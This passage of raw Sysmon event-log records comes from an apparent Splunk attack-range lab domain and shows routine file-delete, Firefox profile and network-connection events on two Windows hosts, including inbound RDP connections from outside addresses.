Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D956EDBD8D8C6E1326A316421C20B821,SHA256=C8A969EA792F85CB601D9984252FE99552D0D71C5406FD19B0BC5CA6E2AFD1DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:11.736{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE8CFEC7CFB0ADD24317884DB0CDE04D,SHA256=E5D3AA8F41313BD3423D651559318938E5E62AE1141CB30C8B0EB62C88D6029C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:11.087{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399BD9B17C035C9FCB2E174921B1E008,SHA256=927C7FCA577E4BDB61237CD5F12CEF224F9C4B2E0B1543F10BC7A08E5D3B24BE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:12.767{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49F59C8F1824EC53CF1814B5D43FCE24,SHA256=487729F53711D67CD6B1BA799ABD17489040764B96B74E7F938CD3D4D47A6DDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:04.661{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50875-false10.0.1.12-8000- 23542300x80000000000000001045452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:12.119{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77755F6141131CEBAD9EA855B6507DEE,SHA256=E7FAB54EFB52329BB9DD11A8D0D7726B53D0FA6927C400F0E51399758F9A74AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:10.400{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57128-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:13.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B08E9ABB97F7C0FF4603E018CEF0FB,SHA256=E6B0571FDC2429C54A7FFED30F4CA9BB069F2AD459BC0D4075340A47458DAABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A8F627E6E4213B2AC2504487F1A9784A,SHA256=6F71E27A506352C54D642832BB81AC44ACC0A12C8B7EA2D42CDF3D5F94CCF402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=513BD2C5A9C48BDF096BCEDAC76F0CF7,SHA256=E70F846539EC7A5F6F0F308A03219C4DAEDE5F22FA5C2A61FFACB6FBD1CF3DDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6BE4FC5CBBEAEB5AB4831E685F910899,SHA256=AED81F78594BCB48535B420C1476B59FBCA9EF31D93B4859F3A2A3EDCA511BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2D9F7911EB8E5A7D2AC81AD88F3EC8ED,SHA256=C411800FF74B2D54FC3D5825467EF96C3BE04907DF332F2ACA05EF7741B26252,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7DA8994B1E68B7F1A2F95E77BA90B236,SHA256=8903ACED0B3FCFAE7FE60E08B54B22D1E198085B9AFBDBA7FEF7526038DBC7AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=98B7FC9DEFD9B08319CFE953676B6412,SHA256=F33C8C695FAFEFE00D985D4C68C4ECAFFC42172FAF00C385DB32E2ED2BE05B2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7A629B560B0948CFD64413383579600E,SHA256=994350B43A868F6932536EABF42832F90EC16FDC23B2DED4C066540D23F79C4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=177A28C3A06E2013287FC7765111EBFA,SHA256=9922B3A9A93EC30CC39E796113275DB5149A41097AA5E7287F301287E5CACB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=365737606F4D43E19876F9D5DCC826C6,SHA256=23C7A0F154453F662BA743E9F0233FB09E67C50E964AAFF5E341F6EEE0D46EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DE5309582FCBE68D975F55C2565CDB93,SHA256=8CEFC8D55A38C466AB72CFBB3A138BCA5913A992CA131518DFA83F8E847CE753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=14852CB422EE770748A1E188D5E44DF0,SHA256=712AEB9D79710021E590889D481F4C4F046735491C56569D1D7EF45A25C04A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:13.154{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB3E52C8388A092FD5D9A5F1ABEC1118,SHA256=8F13133F2551D6661377EBB3A70C57F0A622B583B3ADB3162450DB54662303B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:14.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DDE8B65B020127CC3C46887A41FE2CC,SHA256=E1CACCF2C247D334DDC85073B024235725380370D5DBC52C57F77F5AD4BFEDA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.685{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57129-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001045466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:14.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3058F78D001EB07DD183786178A5B24F,SHA256=4B21A55FB528AF08B8C8DF0E335892FBFA84AEA1547AA5B47EDB20C3C827F0B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:12.356{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse181.214.206.155-23361-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000805694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:14.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39708B4C01F50225A54CBA928464A82C,SHA256=E4D431FB905A8819EE79EB450B62805FED4AA730FC8268599AE220F0A0BC0F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:14.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E59A5D0905F06A3C83CDF77FFA2BC5E7,SHA256=4E7EA43DFF780D547D73A1915F67AE4C96CC5B0DC1532614548291E7813BB1AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:15.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F8CF2B6C38F339279DF1E966B3FB528,SHA256=6BDEC82FDCE586AD0D2033CE4BEE9727718D03CFF0B05CC7A062B06D4364E989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:15.320{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08CD5168587700352B4170704D1AD96F,SHA256=9488B4AAE8FA2670D74D01C850C44736573D97E59B2BFAB1E27A364E8F1EF613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:15.319{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C95318CED7F6C2FC53AFE3401453DB3,SHA256=D1E7BDF900B80EF92B4C43FC648A04C7AD2A90D20EC9594D1D31D37ABF385A4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:15.199{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370D111ACD4F1E78F014FC163973B992,SHA256=6B3E3DFE247F5D235D128051EC0AF96FF195FC7ACCF9B1F7FA3AE7F047AE4038,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:13.279{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57129-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000805699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:16.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=810A49FF490C0CD6833D925DB0C56675,SHA256=94C95F555BBA55F2C7FD79FE6ABF195A80CBD6F747CDF929743D3943D1993A7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:07.858{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50876-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001045472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:07.858{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50876-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001045471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:16.217{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF30732DEEFF1DB7539197AD887C9168,SHA256=04DEA21A65DDEC7EADC88C8B026A45EC00D781C1C5E1F383340011A5131F1505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:17.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D562C3CCF6571D0952244417AD4F4FC0,SHA256=928EF3EDA7E682CE6E38AA1848CABE653149BC1005F898FC76FCB37AF3A699BD,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001045475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:09.794{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50877-false10.0.1.12-8000- 23542300x80000000000000001045474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:17.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6651A899981A307023E4DC04636D1CE5,SHA256=F9BD263F2707A6F44BF7345CC4ADA29B1E46EC553E6AA4BE7951E85C322C5CEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:18.872{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90E7B9D2C7D4289E83FCFC205EC289E1,SHA256=C97644722AA33057418F5775D90FE186420EDA2267CC318EA9FA7C553E372394,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:18.238{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADD0D9744C2B81F4F6FFB94686407F0,SHA256=0E3EE47A112E18E5BD8B50685F491DE075101D880516EB5EB66A505512DAF048,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000805701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:16.364{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57130-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:18.118{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:19.888{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C977D733BDABE7C23C180746AAE4F0FD,SHA256=59200BEEF0079D3E7C7A10A24498AB26DE02F890E032216BB92354FC2650882A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:19.239{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F5A839D7B1F3FE07B16B13E9776DF22,SHA256=803605269EBA8C0F17328490933AC78AE890B75AE303AB664C25D26EF88F8864,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:20.903{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0658C8AD31EADDCD3FE122D6351B32C9,SHA256=D863A62330DFFA5FC6E2AE6273E5D133E8A25BFF70139C723438996B95152568,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:12.580{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-54571-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001045481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:20.637{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BD9A643BE4EFA8342C81F63B9616F4F,SHA256=2B099FA0EB2DC2319777163EA602FA8A0D553A316321F7E013F77AFB18641052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:20.637{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08CD5168587700352B4170704D1AD96F,SHA256=9488B4AAE8FA2670D74D01C850C44736573D97E59B2BFAB1E27A364E8F1EF613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:20.253{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB58D82D096FC98FE07CA710EB60F4E4,SHA256=2FD2A497C9E02E9829C6A79F6739D5C1B6AA3807413D6B030770A1EE866CAFD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:20.278{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:21.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65C48C83EB4BE54954CDDF77C591F8CF,SHA256=A190E41644160F573051C15C0ACC3475C70D70E15CE16931F73D2C7585E0D8BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:21.268{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76D25031572E4E0DF125629D12E5CC82,SHA256=828791CCDCBA9CED6F8DD00FE3690A394C440589D3BE3AE210506E6220FAA33B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:22.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08E4EF75F946D5ABAA7B269CABFC056C,SHA256=299BB6FF39B0D390912CF4E53869529CF94578D47A501472EA7D298355CA8E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:22.498{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B2C5A949DAB8A0CF7A12F4885F3BCC1F,SHA256=A2803526A509AF88AE438F7AF2C4A88346DA8B350FC058A5D29867A91E0B5B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:22.282{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 